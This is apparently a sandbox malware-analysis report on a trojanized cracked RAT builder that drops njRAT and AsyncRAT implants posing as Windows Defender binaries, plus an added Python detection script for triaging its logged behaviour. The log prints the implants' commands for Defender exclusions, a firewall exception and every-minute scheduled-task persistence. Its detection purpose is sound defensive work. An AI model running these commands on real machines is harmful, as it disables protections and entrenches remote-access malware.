Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Windows Defender Notification.exe.0.dr, wBRYVJsNSz.cs Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender Notification.exe.0.dr, qOI2DzwDff.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, wBRYVJsNSz.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, qOI2DzwDff.cs Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender Notification.exe.10.dr, wBRYVJsNSz.cs Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender Notification.exe.10.dr, qOI2DzwDff.cs Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender Notification.exe.0.dr, SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.cs Base64 encoded string: 'z0k3n8d1QlUZGj3/Cw1MZ+Sw+8GjoHfNJw1IRh/u2EpEdamH0Ve2KpMLNwdldO2r'
Source: Windows Defender Notification.exe.0.dr, v9OXbFpunZ.cs Base64 encoded string: 'vOBBMYMUH8sucMy888qB2DdntvpAdH5URgoTARCBSmHmA8MkkDwATtXXaAq4', 'NxuMXrNpv8NXvjjtOnSScCtqQ8ImvaIcYArBQI5IsuEb0lAFltxuUWw750Fe', 'tul8KtZrrFOs73ToEDoTBGOG4YivFvgqzkMBk0KJeqsq4T4rvZD9BuCdkwQs'
Source: Windows Defender Notification.exe.0.dr, wBRYVJsNSz.cs Base64 encoded string: 'HtkKqyCCsGWMASdhGkmxdDP3BxUAN6ARue1FetEchV96k6ucc359MjKQZNYu', 'ZGzFiZEYbw8AsAyCrYf5iLnuDKEdHoOuT1wvadV0Q6TsPWGgrnV911YKPsYA', 'GftXmTDBsrj9eCYbvqyANgNa2J2Wabih1I8Pyih7ulxhttw9tco895BrGXAx', 'rqm406mpFaUeteuc2H0ywSCUnJlpAkADtWOsVAINusYpU6j8DIEv8Lm0977Q', 'JN2jWVD6XxE1StJLoqJB7Hy4pGJ9DdLSpjgzAlnawFgbuiVVenyozhHJQgfY', 'IZsk0shZ2ek0hzaUPhkriuJhbMRFXviCw7i25OfNrfge3CGvoAaeZpN314aC'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.cs Base64 encoded string: 'z0k3n8d1QlUZGj3/Cw1MZ+Sw+8GjoHfNJw1IRh/u2EpEdamH0Ve2KpMLNwdldO2r'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, v9OXbFpunZ.cs Base64 encoded string: 'vOBBMYMUH8sucMy888qB2DdntvpAdH5URgoTARCBSmHmA8MkkDwATtXXaAq4', 'NxuMXrNpv8NXvjjtOnSScCtqQ8ImvaIcYArBQI5IsuEb0lAFltxuUWw750Fe', 'tul8KtZrrFOs73ToEDoTBGOG4YivFvgqzkMBk0KJeqsq4T4rvZD9BuCdkwQs'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, wBRYVJsNSz.cs Base64 encoded string: 'HtkKqyCCsGWMASdhGkmxdDP3BxUAN6ARue1FetEchV96k6ucc359MjKQZNYu', 'ZGzFiZEYbw8AsAyCrYf5iLnuDKEdHoOuT1wvadV0Q6TsPWGgrnV911YKPsYA', 'GftXmTDBsrj9eCYbvqyANgNa2J2Wabih1I8Pyih7ulxhttw9tco895BrGXAx', 'rqm406mpFaUeteuc2H0ywSCUnJlpAkADtWOsVAINusYpU6j8DIEv8Lm0977Q', 'JN2jWVD6XxE1StJLoqJB7Hy4pGJ9DdLSpjgzAlnawFgbuiVVenyozhHJQgfY', 'IZsk0shZ2ek0hzaUPhkriuJhbMRFXviCw7i25OfNrfge3CGvoAaeZpN314aC'
Source: Windows Defender Notification.exe.10.dr, SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.cs Base64 encoded string: 'z0k3n8d1QlUZGj3/Cw1MZ+Sw+8GjoHfNJw1IRh/u2EpEdamH0Ve2KpMLNwdldO2r'
Source: Windows Defender Notification.exe.10.dr, v9OXbFpunZ.cs Base64 encoded string: 'vOBBMYMUH8sucMy888qB2DdntvpAdH5URgoTARCBSmHmA8MkkDwATtXXaAq4', 'NxuMXrNpv8NXvjjtOnSScCtqQ8ImvaIcYArBQI5IsuEb0lAFltxuUWw750Fe', 'tul8KtZrrFOs73ToEDoTBGOG4YivFvgqzkMBk0KJeqsq4T4rvZD9BuCdkwQs'
Source: Windows Defender Notification.exe.10.dr, wBRYVJsNSz.cs Base64 encoded string: 'HtkKqyCCsGWMASdhGkmxdDP3BxUAN6ARue1FetEchV96k6ucc359MjKQZNYu', 'ZGzFiZEYbw8AsAyCrYf5iLnuDKEdHoOuT1wvadV0Q6TsPWGgrnV911YKPsYA', 'GftXmTDBsrj9eCYbvqyANgNa2J2Wabih1I8Pyih7ulxhttw9tco895BrGXAx', 'rqm406mpFaUeteuc2H0ywSCUnJlpAkADtWOsVAINusYpU6j8DIEv8Lm0977Q', 'JN2jWVD6XxE1StJLoqJB7Hy4pGJ9DdLSpjgzAlnawFgbuiVVenyozhHJQgfY', 'IZsk0shZ2ek0hzaUPhkriuJhbMRFXviCw7i25OfNrfge3CGvoAaeZpN314aC'
Source: Windows Defender Notification.exe.10.dr, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Windows Defender Notification.exe.10.dr, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Windows Defender Notification.exe.0.dr, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Windows Defender Notification.exe.0.dr, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.spre.phis.troj.adwa.spyw.evad.winEXE@30/32@0/1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Code function: 2_2_05970032 AdjustTokenPrivileges, 2_2_05970032
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Code function: 2_2_05970006 AdjustTokenPrivileges, 2_2_05970006
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Code function: 7_2_015EB1EE AdjustTokenPrivileges, 7_2_015EB1EE
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Code function: 7_2_015EB1B7 AdjustTokenPrivileges, 7_2_015EB1B7
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Code function: 8_2_010FB1EE AdjustTokenPrivileges, 8_2_010FB1EE
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Code function: 8_2_010FB1B7 AdjustTokenPrivileges, 8_2_010FB1B7
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Code function: 11_2_0109B1EE AdjustTokenPrivileges, 11_2_0109B1EE
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Code function: 11_2_0109B1B7 AdjustTokenPrivileges, 11_2_0109B1B7
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Mutant created: \Sessions\1\BaseNamedObjects\pqN2WFRab1fxKZOt
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1864
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Mutant created: \Sessions\1\BaseNamedObjects\0e75fed00639ea9e725255499292dcddSGFjS2Vk
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe
Source: CraxsRAT v7.6 Cracked.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: CraxsRAT v7.6 Cracked.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: CraxsRAT v7.6 Cracked.exe ReversingLabs: Detection: 63%
Source: CraxsRAT v7.6 Cracked.exe Virustotal: Detection: 54%
Source: unknown Process created: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe "C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe"
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe"
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Process created: C:\Users\user\AppData\Local\Temp\CraxsRat.exe "C:\Users\user\AppData\Local\Temp\CraxsRat.exe"
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" "Windows Defender Real Time Protection.exe" ENABLE
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" ..
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" ..
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" ..
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1864 -s 800
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender Notification.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender Notification.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender Notification.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Notification" /tr "C:\Users\user\AppData\Roaming\Windows Defender Notification.exe"
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe "C:\Users\user\AppData\Roaming\Windows Defender Notification.exe"
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe"
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Process created: C:\Users\user\AppData\Local\Temp\CraxsRat.exe "C:\Users\user\AppData\Local\Temp\CraxsRat.exe"
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe"
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" "Windows Defender Real Time Protection.exe" ENABLE
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe'
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender Notification.exe'
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender Notification.exe'
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender Notification.exe'
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Notification" /tr "C:\Users\user\AppData\Roaming\Windows Defender Notification.exe"
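Read in order, the process-creation lines above are the implant's setup sequence: the dropper writes two binaries named after Windows Defender components into the user's Temp directory; the first opens a firewall exception for itself through the deprecated "netsh firewall" context; the second runs PowerShell with -ExecutionPolicy Bypass to exclude its own path and process name from Defender scanning (twice, for the Temp and the Roaming copy); then it registers a scheduled task at the highest run level that relaunches the Roaming copy every minute. The mutex further up, 0e75fed00639ea9e725255499292dcddSGFjS2Vk, is 32 hex characters followed by a base64 tail that decodes to "HacKed", the default njRAT campaign identifier. The script below is an added example written for this page, not code from the Joe Sandbox report or from the sample: it parses lines in the report's own "Source: ... Process created: ..." / "Mutant created: ..." shape and applies one check per step, with ATT&CK technique IDs and rule names chosen by me. The excerpt embedded in it is copied from the report lines above, one of them kept with the trailing "Jump to behavior" link text the HTML rendering adds, to show the parser drops it.

```python
"""Rule-based triage of sandbox 'Process created' / 'Mutant created' lines (added example)."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Shape of a report line: "Source: <process> <Action>: <detail>[ Jump to behavior]"
LINE_RE = re.compile(
    r"^Source: (?P<src>.+?) (?P<action>Process created|Mutant created): "
    r"(?P<detail>.+?)(?: Jump to behavior)?$"
)
# Detail of a process line is "<image path> <command line>"; the image path ends at the first .exe
IMAGE_RE = re.compile(r"^(?P<image>.+?\.exe)\s+(?P<cmdline>.*)$", re.IGNORECASE)
# Locations a normal user can write to; no legitimate Defender component runs from them
USER_WRITABLE = re.compile(r"\\AppData\\|\\Temp\\|\\Desktop\\", re.IGNORECASE)
DEFENDER_NAME = re.compile(r"windows defender", re.IGNORECASE)
# njRAT-style object name: 32 hex characters followed by base64(campaign id)
NJRAT_MUTEX = re.compile(r"^([0-9a-f]{32})([A-Za-z0-9+/=]{4,})$")


@dataclass
class Finding:
    rule: str
    technique: str   # MITRE ATT&CK technique ID, or "IOC" for a plain indicator
    source: str      # process that performed the action
    evidence: str    # command line or object name that fired the rule


def b64_tag(tag: str) -> Optional[str]:
    """Decode a base64 tail to printable ASCII; None if it is not valid base64 text."""
    try:
        raw = base64.b64decode(tag + "=" * (-len(tag) % 4), validate=True)
        text = raw.decode("ascii")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None
    return text if text and text.isprintable() else None


def analyse_process(src: str, detail: str) -> List[Finding]:
    m = IMAGE_RE.match(detail)
    if not m:
        return []
    image, cmd = m.group("image"), m.group("cmdline")
    low = cmd.lower()
    found: List[Finding] = []
    if DEFENDER_NAME.search(image) and USER_WRITABLE.search(image):
        found.append(Finding("Defender-named binary launched from a user-writable path",
                             "T1036.005", src, image))
    if "add-mppreference" in low and ("-exclusionpath" in low or "-exclusionprocess" in low):
        found.append(Finding("Defender exclusion added through PowerShell", "T1562.001", src, cmd))
    if "netsh" in low and "firewall" in low and "allowedprogram" in low:
        found.append(Finding("Firewall exception added with the deprecated netsh firewall context",
                             "T1562.004", src, cmd))
    if "schtasks" in low and "/create" in low:
        target = re.search(r'/tr\s+"([^"]+)"', cmd, re.IGNORECASE)
        if "/sc minute" in low and target and USER_WRITABLE.search(target.group(1)):
            found.append(Finding("Minute-interval scheduled task pointing at a user-writable path",
                                 "T1053.005", src, cmd))
    return found


def analyse_mutex(src: str, name: str) -> List[Finding]:
    m = NJRAT_MUTEX.match(name.rsplit("\\", 1)[-1])   # strip \Sessions\1\BaseNamedObjects\
    tag = b64_tag(m.group(2)) if m else None
    if tag is None:
        return []
    return [Finding(f"njRAT-style mutex, campaign id {tag!r}", "IOC", src, name)]


def scan(report: str) -> List[Finding]:
    """Run every rule over each parseable line of a report excerpt."""
    findings: List[Finding] = []
    for line in report.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        src, action, detail = m.group("src", "action", "detail")
        handler = analyse_process if action == "Process created" else analyse_mutex
        findings.extend(handler(src, detail))
    return findings


# Excerpt copied from the report lines above (third line kept with its "Jump to behavior" link text)
REPORT_EXCERPT = r"""
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Mutant created: \Sessions\1\BaseNamedObjects\0e75fed00639ea9e725255499292dcddSGFjS2Vk
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe"
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" "Windows Defender Real Time Protection.exe" ENABLE Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe"
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe'
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender Notification.exe'
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Notification" /tr "C:\Users\user\AppData\Roaming\Windows Defender Notification.exe"
"""

if __name__ == "__main__":
    for f in scan(REPORT_EXCERPT):
        print(f"[{f.technique}] {f.rule}\n    by {f.source}\n    {f.evidence}")
```

Against the excerpt the script yields seven findings: both Defender-named drops flagged as masquerading, both exclusion commands, the firewall exception, the scheduled task, and the decoded mutex; the conhost.exe launch produces nothing. The masquerading check keys on the image path rather than the command line on purpose, so a legitimate Defender component invoked from System32 with a suspicious argument string does not trip it; the exclusion and firewall checks deliberately ignore where the parent lives, since those commands are worth a look from any parent.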
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe Section loaded: kernel.appcore.dll
